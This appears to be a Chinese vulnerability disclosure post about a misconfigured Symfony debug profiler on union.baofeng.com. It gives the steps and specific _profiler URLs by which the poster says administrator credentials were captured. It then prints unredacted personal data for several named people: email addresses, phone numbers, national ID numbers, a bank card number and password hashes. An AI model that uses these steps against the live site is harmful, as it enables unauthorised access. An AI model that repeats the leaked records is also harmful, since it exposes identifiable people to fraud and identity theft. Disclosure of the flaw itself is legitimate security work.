用symfony这个框架搭建的配置不当
后台地址http://union.baofeng.com/login
抓到管理员帐号密码
这个洞最蛋疼的就是得等,不过管理帐号都搞到了,就不用再等了
浏览这个页面http://union.baofeng.com/_profiler/empty/search/results?limit=100
关键信息就是第一行的token
我们用这个token访问这个http://union.baofeng.com/_profiler/b616dc
把token加到_profiler后面
我列举几个 姜兆勇 [email protected] 15996110393 320723198510192617 6217001280001247353
http://union.baofeng.com/_profiler/60e43b
http://union.baofeng.com/_profiler/79e874
秦嘉成 445321198507235214 [email protected] 18620909778 557decc0bfc6ef3dcfeaf4f9f05819af
http://union.baofeng.com/_profiler/e6a93e
http://union.baofeng.com/_profiler/40f295
冯晶晶 [email protected] 798c089807b2ec3ff4d67a34f436185c 18201659496